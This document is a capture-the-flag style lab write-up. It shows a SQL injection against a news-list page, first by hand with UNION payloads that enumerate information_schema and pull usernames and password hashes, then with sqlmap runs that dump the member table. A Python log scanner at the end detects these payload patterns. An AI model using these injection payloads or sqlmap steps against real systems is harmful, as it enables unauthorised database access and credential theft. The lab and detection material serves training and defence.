Locating the SQL injection point
The area marked with the red box has a SQL injection vulnerability.
First attempt at SQL injection
Let's get started.
The intent was actually to test 1'and 1=1# ':
http://<lab IP>:<port>/new_list.php?id=tingjigonggao%201%27and%201=1#%20'
At this point I was completely baffled: why did it still not work with '# appended? After looking it up I found there are other comment styles:
#, --+, --%20, %23
1. Start vulnerability detection:
http://<lab IP>:<port>/new_list.php?id=tingjigonggao ' and '1'='1' %23 normal
http://<lab IP>:<port>/new_list.php?id=tingjigonggao ' and '1'='1' --+ normal
http://<lab IP>:<port>/new_list.php?id=tingjigonggao ' and '1'='2' --+ error
2. Gather information:
Having confirmed the vulnerability, collect database information, including but not limited to the database name, version number, database user and operating system. At the start `and 1=1` did not work, and I had already gone straight in with sqlmap and learned it was MySQL, so here I simply query the version number:
http://<lab IP>:<port>/new_list.php?id= id=tingjigonggao 'and 1=2 union select 1,2,version(),4 --+
At this point the information still was not displayed; I only understood later that the first query has to be made false before the result shows.
Looking it up, MariaDB-10.2.15 counts as above MySQL 5.0.
MySQL 5.0 and above ship with a built-in database named information_schema, which stores the names of all databases, tables and columns; in effect, querying it yields the table names or column names under a specified database.
http://<lab IP>:<port>/new_list.php?id= id=tingjigonggao 'and 1=2 union select 1,2,version(),4 --+
3. Determine the number of columns/fields
http://<lab IP>:<port>/new_list.php?id=tingjigonggao ' order by 1 --+ normal
http://<lab IP>:<port>/new_list.php?id=tingjigonggao ' order by 2 --+ normal
http://<lab IP>:<port>/new_list.php?id=tingjigonggao ' order by 3 --+ normal
http://<lab IP>:<port>/new_list.php?id=tingjigonggao ' order by 4 --+ normal
http://<lab IP>:<port>/new_list.php?id=tingjigonggao ' order by 5 --+ error
4. Query tables by database:
http://219.153.49.228:49617/new_list.php?id= id=tingjigonggao 'and 1=2 union select 1,2,group_concat(schema_name),4 from information_schema.schemata --+
Query the mozhe_discuz_stormgroup database:
http://219.153.49.228:49617/new_list.php?id=tingjigonggao 'and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='stormgroup_member' --+
Query the contents of the specified table stormgroup_member:
http://219.153.49.228:49617/new_list.php?id=tingjigonggao 'and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='stormgroup_member' --+
Query the table to obtain the account and password:
http://219.153.49.228:49617/new_list.php?id=tingjigonggao 'and 1=2 union select 1,2,group_concat(concat_ws(':',name,password)),4 from mozhe_discuz_stormgroup.stormgroup_member --+
5. Decrypt and log in
Decrypt:
Login successful:
Lab:
https://www.mozhe.cn/
Going all-in with SQLmap
After manually trying 1' and 1=1 and seeing the site simply error out, I tried SQLmap:
C:\Users\admin\Desktop\Tools\SQLmap>python sqlmap.py -u "http://219.153.49.228:42376/new_list.php?id=tingjigonggao"
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.12.7#dev}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:11:56 /2022-01-03/
[23:11:56] [INFO] testing connection to the target URL
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=tingjigonggao' AND 6957=6957 AND 'LrvT'='LrvT
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=tingjigonggao' AND (SELECT 6615 FROM (SELECT(SLEEP(5)))ijKh) AND 'OCXI'='OCXI
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-5401' UNION ALL SELECT NULL,NULL,CONCAT(0x716a717671,0x6e54534868474e7353434146766a4b5953526d7a4f52596165564b53545a62705470754f78584c41,0x717a6b7671),NULL-- -
---
[23:12:25] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.6.37
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
The database turns out to be MySQL with a version above 5.0; first list the database names:
-D <database name> --tables
[23:14:49] [INFO] retrieved: 'INNODB_SYS_SEMAPHORE_WAITS'
Database: information_schema
[75 tables]
+---------------------------------------+
| ALL_PLUGINS |
| APPLICABLE_ROLES |
| CHARACTER_SETS |
| CLIENT_STATISTICS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENABLED_ROLES |
| ENGINES |
| EVENTS |
| FILES |
| GEOMETRY_COLUMNS |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INDEX_STATISTICS |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_PER_INDEX |
| INNODB_CMP_PER_INDEX_RESET |
| INNODB_CMP_RESET |
| INNODB_FT_BEING_DELETED |
| INNODB_FT_CONFIG |
| INNODB_FT_DEFAULT_STOPWORD |
| INNODB_FT_DELETED |
| INNODB_FT_INDEX_CACHE |
| INNODB_FT_INDEX_TABLE |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_METRICS |
| INNODB_MUTEXES |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_DATAFILES |
| INNODB_SYS_FIELDS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_INDEXES |
| INNODB_SYS_SEMAPHORE_WAITS |
| INNODB_SYS_TABLES |
| INNODB_SYS_TABLESPACES |
| INNODB_SYS_TABLESTATS |
| INNODB_SYS_VIRTUAL |
| INNODB_TABLESPACES_ENCRYPTION |
| INNODB_TABLESPACES_SCRUBBING |
| INNODB_TRX |
| KEY_CACHES |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| SPATIAL_REF_SYS |
| STATISTICS |
| SYSTEM_VARIABLES |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TABLE_STATISTICS |
| TRIGGERS |
| USER_PRIVILEGES |
| USER_STATISTICS |
| VIEWS |
| user_variables |
+---------------------------------------+
Next, get the table information:
-D <database name> -T <table name> --columns
C:\Users\admin\Desktop\Tools\SQLmap>python sqlmap.py -u "http://219.153.49.228:42376/new_list.php?id=tingjigonggao" -D mozhe_discuz_stormgroup --tables
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[23:34:43] [INFO] fetching tables for database: 'mozhe_discuz_stormgroup'
[23:34:43] [INFO] retrieved: 'notice'
[23:34:43] [INFO] retrieved: 'stormgroup_member'
Database: mozhe_discuz_stormgroup
[2 tables]
+-------------------+
| notice |
| stormgroup_member |
+-------------------+
C:\Users\admin\Desktop\Tools\SQLmap>python sqlmap.py -u "http://219.153.49.228:42376/new_list.php?id=tingjigonggao" -D mozhe_discuz_stormgroup -T stormgroup_member --columns
[23:41:02] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.6.37
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[23:41:02] [INFO] fetching columns for table 'stormgroup_member' in database 'mozhe_discuz_stormgroup'
[23:41:02] [INFO] retrieved: 'id','int(11)'
[23:41:02] [INFO] retrieved: 'name','varchar(20)'
[23:41:02] [INFO] retrieved: 'password','varchar(255)'
[23:41:03] [INFO] retrieved: 'status','int(11)'
Database: mozhe_discuz_stormgroup
Table: stormgroup_member
[4 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| id | int(11) |
| name | varchar(20) |
| password | varchar(255) |
| status | int(11) |
+----------+--------------+
Show the entire contents of this table:
C:\Users\admin\Desktop\Tools\SQLmap>python sqlmap.py -u "http://219.153.49.228:42376/new_list.php?id=tingjigonggao" -D mozhe_discuz_stormgroup -T stormgroup_member users --dump --batch
[23:43:28] [WARNING] user aborted during dictionary-based attack phase (Ctrl+C was pressed)
[23:43:28] [WARNING] no clear password(s) found
Database: mozhe_discuz_stormgroup
Table: stormgroup_member
[2 entries]
+----+-------+--------+----------------------------------+
| id | name | status | password |
+----+-------+--------+----------------------------------+
| 2 | mozhe | 0 | 356f589a7df439f6f744ff19bb8092c0 |
| 1 | mozhe | 1 | 94f394c26135c2d82d3d6c98ad1dee77 |
+----+-------+--------+----------------------------------+
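As an added example that is not part of this write-up, the Python below takes the defender's view of the two halves above: it scans web-server access-log lines for the request shapes seen in the manual walkthrough (comment terminators, order by probes, UNION / information_schema queries) and in sqlmap's boolean, time-based and UNION payloads, and reports which indicators each request trips. The log lines are constructed to mirror the write-up's requests, and the indicator rules are my own assumptions, not anything the lab or sqlmap provides.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Indicators modelled on the payload shapes in this write-up (manual probes and
# sqlmap's boolean / time-based / UNION payloads); matched on the decoded, lower-cased value.
INDICATORS = {
    "comment_terminator": re.compile(r"--(\s|$)|#"),               # --+, --%20, -- -, %23
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),            # column-count probing
    "schema_enum": re.compile(r"\binformation_schema\b"),
    "tautology": re.compile(r"\band\s+'?(\w+)'?\s*=\s*'?\1\b"),     # and 1=1, AND 'x'='x
    "time_delay": re.compile(r"\bsleep\s*\("),
}
# Combined log format: addr ident user [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def scan_request(target):
    """Return {param: [indicator names]} for each query parameter that trips a rule."""
    hits = {}
    # urlsplit drops everything after a raw '#': a browser never sends the fragment,
    # which is why the literal '#' terminator failed and '%23' / '--+' had to be used.
    for param, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        # parse_qs decodes once; a second unquote_plus also exposes double-encoded payloads
        decoded = " ".join(unquote_plus(v) for v in values).lower()
        found = sorted(name for name, pat in INDICATORS.items() if pat.search(decoded))
        if found:
            hits[param] = found
    return hits

def scan_log(lines):
    """Return one alert dict per log line whose request carries injection indicators."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (hits := scan_request(m["target"])):
            alerts.append({"ip": m["ip"], "time": m["ts"], "status": m["status"], "hits": hits})
    return alerts

# Constructed sample lines (not real traffic) mirroring the requests in the write-up.
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Jan/2022:23:10:01 +0800] "GET /new_list.php?id=tingjigonggao HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    # the first manual try: "#%20'" was a fragment, so only this much reached the server
    '10.0.0.5 - - [03/Jan/2022:23:10:09 +0800] "GET /new_list.php?id=tingjigonggao%201%27and%201=1 HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [03/Jan/2022:23:11:20 +0800] "GET /new_list.php?id=tingjigonggao%27%20order%20by%205%20--+ HTTP/1.1" 500 214 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [03/Jan/2022:23:11:42 +0800] "GET /new_list.php?id=tingjigonggao%27and%201=2%20union%20select%201,2,group_concat(schema_name),4%20from%20information_schema.schemata%20--+ HTTP/1.1" 200 1610 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [03/Jan/2022:23:12:05 +0800] "GET /new_list.php?id=tingjigonggao%27%20AND%20(SELECT%206615%20FROM%20(SELECT(SLEEP(5)))ijKh)%20AND%20%27OCXI%27=%27OCXI HTTP/1.1" 200 1532 "-" "sqlmap/1.5.12.7#dev"',
    '10.0.0.5 - - [03/Jan/2022:23:12:25 +0800] "GET /new_list.php?id=-5401%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x716a717671,0x6e54,0x717a6b7671),NULL--%20- HTTP/1.1" 200 1588 "-" "sqlmap/1.5.12.7#dev"',
]
```

scan_log(SAMPLE_LOG) returns five alerts; the benign first line is silent, and the second line trips only the tautology rule because the literal '#' and everything after it never reached the server.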